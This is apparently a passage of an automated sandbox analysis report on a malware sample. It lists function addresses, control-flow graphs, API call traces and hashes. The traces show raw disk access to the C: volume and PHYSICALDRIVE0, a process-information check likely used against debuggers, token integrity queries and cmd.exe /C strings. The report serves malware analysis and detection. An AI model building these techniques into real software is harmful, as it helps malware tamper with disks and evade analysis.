                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalInitSectionStringUnicode$AllocateDirectoryEnterEnumerateLeaveLoadedMemoryModulesVirtualWindows
                                                                                                                                                                      • String ID: explorer.exe
                                                                                                                                                                      • API String ID: 3728205514-3187896405
                                                                                                                                                                      • Opcode ID: 971d90eb416ca67aafcaf3557b906dfb5bbb6d99924e81ee9f7e95ee9359d988
                                                                                                                                                                      • Instruction ID: d3c5517ac64ebe0f4a93bb8fcf9093c65cacff95b6910bca11f849b0b04bbd4d
                                                                                                                                                                      • Opcode Fuzzy Hash: 971d90eb416ca67aafcaf3557b906dfb5bbb6d99924e81ee9f7e95ee9359d988
                                                                                                                                                                      • Instruction Fuzzy Hash: 4F3195B5940208EBC704DF90DCC5FA97775AB48305F1081BAFA05672D1E7B8AE85CB5D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00408958 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57fileCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 71 408958-4089db CreateFileA DeviceIoControl 72 4047e0-4047ed FindCloseChangeNotification 71->72 73 4089e1-4089e5 71->73 73->72 74 4089eb-408a08 73->74 74->72
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 004047E4
                                                                                                                                                                      • CreateFileA.KERNELBASE(\\.\C:,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00408972
                                                                                                                                                                      • DeviceIoControl.KERNELBASE(?,00560000,00000000,00000000,?,00000020,?,00000000), ref: 00408994
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ChangeCloseControlCreateDeviceFileFindNotification
                                                                                                                                                                      • String ID: \\.\C:$\\.\PHYSICALDRIVE0
                                                                                                                                                                      • API String ID: 1020254441-2160117148
                                                                                                                                                                      • Opcode ID: 320e27fcbf62a17e998bc26e42cf0c1a2d27fdc4df0059520f6dda202d1693b9
                                                                                                                                                                      • Instruction ID: 6179182b2b83b9443c5bd9d33f461fa1aeab268a59a3a7b7debce46551af33e6
                                                                                                                                                                      • Opcode Fuzzy Hash: 320e27fcbf62a17e998bc26e42cf0c1a2d27fdc4df0059520f6dda202d1693b9
                                                                                                                                                                      • Instruction Fuzzy Hash: AF216D38640348EFD718CF68ED45F99BBB4EB48701F10C1AAE905AB3E1D6B49B40CB58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040895B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57fileCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 75 40895b-4089db CreateFileA DeviceIoControl 76 4047e0-4047ed FindCloseChangeNotification 75->76 77 4089e1-4089e5 75->77 77->76 78 4089eb-408a08 77->78 78->76
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 004047E4
                                                                                                                                                                      • CreateFileA.KERNELBASE(\\.\C:,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00408972
                                                                                                                                                                      • DeviceIoControl.KERNELBASE(?,00560000,00000000,00000000,?,00000020,?,00000000), ref: 00408994
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ChangeCloseControlCreateDeviceFileFindNotification
                                                                                                                                                                      • String ID: \\.\C:$\\.\PHYSICALDRIVE0
                                                                                                                                                                      • API String ID: 1020254441-2160117148
                                                                                                                                                                      • Opcode ID: 6e1c8ed08f6fcb21cf0fed49fef2ed80236c62ed62855b81c13f5c76d91f0969
                                                                                                                                                                      • Instruction ID: 711083b2bbb86b7d36e7a7c78397dedf6b4307ebbdc5261e1e4f3fe33cb2826c
                                                                                                                                                                      • Opcode Fuzzy Hash: 6e1c8ed08f6fcb21cf0fed49fef2ed80236c62ed62855b81c13f5c76d91f0969
                                                                                                                                                                      • Instruction Fuzzy Hash: 6F215C38600308AFD718CF58DC46F99BBB4AB48701F10C0AAE905AB3E1D6B4AA40CB58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00408951 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56fileCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 79 408951-4089db CreateFileA DeviceIoControl 81 4047e0-4047ed FindCloseChangeNotification 79->81 82 4089e1-4089e5 79->82 82->81 83 4089eb-408a08 82->83 83->81
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 004047E4
                                                                                                                                                                      • CreateFileA.KERNELBASE(\\.\C:,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00408972
                                                                                                                                                                      • DeviceIoControl.KERNELBASE(?,00560000,00000000,00000000,?,00000020,?,00000000), ref: 00408994
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ChangeCloseControlCreateDeviceFileFindNotification
                                                                                                                                                                      • String ID: \\.\C:$\\.\PHYSICALDRIVE0
                                                                                                                                                                      • API String ID: 1020254441-2160117148
                                                                                                                                                                      • Opcode ID: 43b5c774c06db54b38c673015130514d13990ffabb50efddd8f557c0ac6fe542
                                                                                                                                                                      • Instruction ID: 389e508c5a35674a8dec956cf5ed0ace9ff19c3110c7d277eeff61c57732489a
                                                                                                                                                                      • Opcode Fuzzy Hash: 43b5c774c06db54b38c673015130514d13990ffabb50efddd8f557c0ac6fe542
                                                                                                                                                                      • Instruction Fuzzy Hash: 79216D78604348EFD708CF58E855BA9BBB4EB48711F10C1AAE905AB3E1D7B49B40CB59
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401B2C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39nativeCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 193 401b2c-401b36 194 402a85-402ab5 call 40335c NtQueryInformationProcess 193->194 195 401b3c-401b3e 193->195 199 401fe6-401fe8 194->199 200 402abb-402ac3 194->200 196 40844c-40844f 195->196 199->196 201 40bda2 200->201 202 402ac9-409df6 200->202 202->196
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtQueryInformationProcess.NTDLL(00000000,00000000,00000020,00000020,00000000), ref: 00402AA8
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InformationProcessQuery
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1778838933-3916222277
                                                                                                                                                                      • Opcode ID: 99cf6030004cc14fcfbf758772858fa4ef28e9fcd54024a0ddfc1a5f41bc18d2
                                                                                                                                                                      • Instruction ID: b5fb0c1052741472a29b3626a296402ee31a9556d555090f334d473f401f16ea
                                                                                                                                                                      • Opcode Fuzzy Hash: 99cf6030004cc14fcfbf758772858fa4ef28e9fcd54024a0ddfc1a5f41bc18d2
                                                                                                                                                                      • Instruction Fuzzy Hash: 0E01A471D04308FBDB00DF90C98A7EDBBB8AB05314F24506AE540772C1E7BC9685A75A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040AEA4 Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 204 40aea4-40aec0 GetPEB call 40d1f6 207 401bd2-401bd9 call 40c13c 204->207 208 40aec6 call 404369 204->208 213 4044bc-4044c3 call 403aee 207->213 214 401bdf 207->214 212 40aecb 208->212 212->207 218 4044c9 213->218 219 40a95e-40a96a call 4043ad call 407d21 213->219 215 40bfa2-40bfa5 214->215 218->215 224 40a970-40a97b Sleep call 4023f2 219->224 225 402b44-402b46 ExitProcess 219->225 227 40a980 224->227 227->225
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Module$FileHandleInitializeLibraryLoadName
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1691763914-0
                                                                                                                                                                      • Opcode ID: 7a2ac303de4b0b2ba4ade585fa2e29916ceed782501468d31b7631315bf6b27d
                                                                                                                                                                      • Instruction ID: b20ac1345fbffd2ee6b09d0fcfa97f88ae309217d757d61775f2d603f36cc11d
                                                                                                                                                                      • Opcode Fuzzy Hash: 7a2ac303de4b0b2ba4ade585fa2e29916ceed782501468d31b7631315bf6b27d
                                                                                                                                                                      • Instruction Fuzzy Hash: 0BF0BE70608345D6C6047FB38E4672A76B8AF0030DF10407FFD02B62D2EA7E9A11559F
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00407D21 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 00407D33
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2050909247-0
                                                                                                                                                                      • Opcode ID: 5469e9984ee0613fe67692c8399fce14f271ad5feb70d4257aac3e9e61b94720
                                                                                                                                                                      • Instruction ID: 2d0ccdd24a91546423dca3ee3cf720458c613a0087a6006a7f2d7a66fbfa4b10
                                                                                                                                                                      • Opcode Fuzzy Hash: 5469e9984ee0613fe67692c8399fce14f271ad5feb70d4257aac3e9e61b94720
                                                                                                                                                                      • Instruction Fuzzy Hash: 4CF065B4D00348EFC704EFA599896ADBBB4AB04701F10857AE85277395E2BC5644CF9A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040E52B Relevance: 21.1, APIs: 11, Strings: 3, Instructions: 60memoryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 40e52b-40e632 LocalAlloc * 11
                                                                                                                                                                      APIs
                                                                                                                                                                      • LocalAlloc.KERNELBASE(00000040,00004000,004046B5,?,0040C145,004046B5,?,00401BD7), ref: 0040E53D
                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00004000,?,0040C145,004046B5,?,00401BD7), ref: 0040E54F
                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00004000,?,0040C145,004046B5,?,00401BD7), ref: 0040E561
                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00001000,?,0040C145,004046B5,?,00401BD7), ref: 0040E573
                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00001000,?,0040C145,004046B5,?,00401BD7), ref: 0040E585
                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00008000,?,0040C145,004046B5,?,00401BD7), ref: 0040E597
                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00008004,?,0040C145,004046B5,?,00401BD7), ref: 0040E5A9
                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,000001F4,?,0040C145,004046B5,?,00401BD7), ref: 0040E5E5
                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,000000FC,?,0040C145,004046B5,?,00401BD7), ref: 0040E5F7
                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000400,?,0040C145,004046B5,?,00401BD7), ref: 0040E609
                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00010000,?,0040C145,004046B5,?,00401BD7), ref: 0040E61B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocLocal
                                                                                                                                                                      • String ID: Pw$X/x$`ox
                                                                                                                                                                      • API String ID: 3494564517-2518967044
                                                                                                                                                                      • Opcode ID: 65ac8032e033309efcc9f8c0d48804f40c42494c7e65b2be43682c95c20d6d53
                                                                                                                                                                      • Instruction ID: 884c2741ace77f4595bd006b1489b08cdeecc1dacb1c364e852769e485284a96
                                                                                                                                                                      • Opcode Fuzzy Hash: 65ac8032e033309efcc9f8c0d48804f40c42494c7e65b2be43682c95c20d6d53
                                                                                                                                                                      • Instruction Fuzzy Hash: 44213CB4A41300AFF354AF65AC56B743AA0F708B59F108035FB89A63E0F6F455858E5F
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00405C4C Relevance: 12.1, APIs: 8, Instructions: 78memoryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401244
                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 00403BD3
                                                                                                                                                                      • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00407A5F
                                                                                                                                                                      • LocalAlloc.KERNEL32(00000000,00000000), ref: 00407A6B
                                                                                                                                                                      • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00407A86
                                                                                                                                                                      • OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 00409C94
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Token$InformationLocal$AllocChangeCloseFindFreeNotificationOpenProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2854556994-0
                                                                                                                                                                      • Opcode ID: 2fabac034638274b2c3e67be2bc06953f5cdff95292f6c9f39c7e9c359d166b0
                                                                                                                                                                      • Instruction ID: 2e4b4cc31351ce880421fb230fd6ac05725b6f10eb8191371f756e524e2f733f
                                                                                                                                                                      • Opcode Fuzzy Hash: 2fabac034638274b2c3e67be2bc06953f5cdff95292f6c9f39c7e9c359d166b0
                                                                                                                                                                      • Instruction Fuzzy Hash: ED313CB4A04208FFDB14CFD4C948BAEBBF8AB48301F1081AAE511B72D4D774AB04DB65
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00404369 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000105), ref: 00404380
                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00404388
                                                                                                                                                                        • Part of subcall function 00409543: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409574
                                                                                                                                                                        • Part of subcall function 00409543: NtAllocateVirtualMemory.NTDLL(000000FF,0046C2D0,00000000,00001000,00003000,00000004), ref: 004095E1
                                                                                                                                                                        • Part of subcall function 00409543: EnterCriticalSection.KERNEL32(DB51E8EC), ref: 00409610
                                                                                                                                                                        • Part of subcall function 00409543: RtlInitUnicodeString.NTDLL(00000180,005C0000), ref: 00409626
                                                                                                                                                                        • Part of subcall function 00409543: RtlInitUnicodeString.NTDLL(00000178,005C0000), ref: 0040963C
                                                                                                                                                                        • Part of subcall function 00409543: LeaveCriticalSection.KERNEL32(DB51E8EC), ref: 00409649
                                                                                                                                                                        • Part of subcall function 00409543: LdrEnumerateLoadedModules.NTDLL(00000000,004050A2,00404393), ref: 0040965A
                                                                                                                                                                        • Part of subcall function 00405C4C: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401244
                                                                                                                                                                        • Part of subcall function 00405C4C: LocalFree.KERNEL32(00000000), ref: 00403BD3
                                                                                                                                                                        • Part of subcall function 00405C4C: OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 00409C94
                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040A945
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalInitProcessSectionStringUnicode$AllocateChangeCloseDirectoryEnterEnumerateExitFileFindFreeInitializeLeaveLoadedLocalMemoryModuleModulesNameNotificationOpenTokenVirtualWindows
                                                                                                                                                                      • String ID: %systemroot%\system32\cmd.exe$/C
                                                                                                                                                                      • API String ID: 41577365-3057154508
                                                                                                                                                                      • Opcode ID: a438ef9f5f25d9aebddb8c854ded96209a6b7bafee1d22157f4d592698697d9c
                                                                                                                                                                      • Instruction ID: 7b01f62542bec0b1d87828faea97dd6a3c55c304531570e4c9315d46f9a50642
                                                                                                                                                                      • Opcode Fuzzy Hash: a438ef9f5f25d9aebddb8c854ded96209a6b7bafee1d22157f4d592698697d9c
                                                                                                                                                                      • Instruction Fuzzy Hash: 9411ABB290430866D710BB60EC47FDE73299B54705F0045BBB709B50C2ED7997D88EAE
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00407AB9 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 84 407ab9-407abc 85 407a69-407a8e LocalAlloc GetTokenInformation 84->85 86 407abe 84->86 88 407a94 85->88 89 40103c-40106b GetSidSubAuthorityCount GetSidSubAuthority 85->89 87 407abf-407ad2 86->87 93 408020-408024 87->93 94 407ad8-407afe call 4055b9 87->94 90 401236-40123a 88->90 91 401071 89->91 92 409c8c-409c9c OpenProcessToken 89->92 99 401240-40124a FindCloseChangeNotification 90->99 100 403bc5-403bc9 90->100 91->90 97 407a51-407a68 GetTokenInformation 92->97 98 409ca2 92->98 95 401ea5-401eb9 93->95 96 40802a-408031 93->96 109 407b04-407b0a 94->109 110 4059ea 94->110 104 402035-40203e 95->104 105 401ebf-401ed3 95->105 102 408037-408039 96->102 103 4021ce 96->103 97->85 98->90 99->100 106 40294f-402955 100->106 107 403bcf-403bd9 LocalFree 100->107 111 403d6f-403d72 102->111 103->111 112 4045e8-4045fb 104->112 105->104 113 401ed9-401ee0 105->113 107->106 109->93 110->87 115 404601-404621 call 4055b9 call 40b8c1 112->115 116 409bce-409beb call 40c187 call 40dcf9 call 40ce09 112->116 113->104 114 401ee6-401ee8 113->114 114->111 125 40b344 115->125 126 404627-40462e 115->126 132 409bf1-409bf3 116->132 133 4024fe-40250e call 40dcf9 116->133 125->112 126->125 128 404634-40463e 126->128 130 404644-40464b 128->130 131 40cc1b-40cc25 128->131 134 404651 130->134 135 409ca7-40a398 130->135 136 40cc2b-40cc32 131->136 137 40997f-409986 131->137 132->111 133->111 134->131 135->125 143 40a39e-40a3b3 135->143 136->135 139 40cc38 136->139 137->125 140 40998c 137->140 139->137 140->135 144 40a3b6 143->144 144->144
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401244
                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 00403BD3
                                                                                                                                                                      • LocalAlloc.KERNEL32(00000000,00000000), ref: 00407A6B
                                                                                                                                                                      • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00407A86
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1766949397.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000011.00000002.1766889793.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1766999117.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 00000011.00000002.1767182872.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Local$AllocChangeCloseFindFreeInformationNotificationToken
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2094194634-0
                                                                                                                                                                      • Opcode ID: dfd389ba0a6e21506ee3ce54b84a7e53c4fc79e48b909ed38b184a154f02c170
                                                                                                                                                                      • Instruction ID: 8c14f008afbfcab52b1f24e0be9b5b67c8a06fc3440972dff98bedf792b56cd5
                                                                                                                                                                      • Opcode Fuzzy Hash: dfd389ba0a6e21506ee3ce54b84a7e53c4fc79e48b909ed38b184a154f02c170
                                                                                                                                                                      • Instruction Fuzzy Hash: 2E215E74D04208EFCB04CFE4C959AEEBBB5AB08305F1480AAE505B7394C7746B40DF29
                                                                                                                                                                      Uniqueness

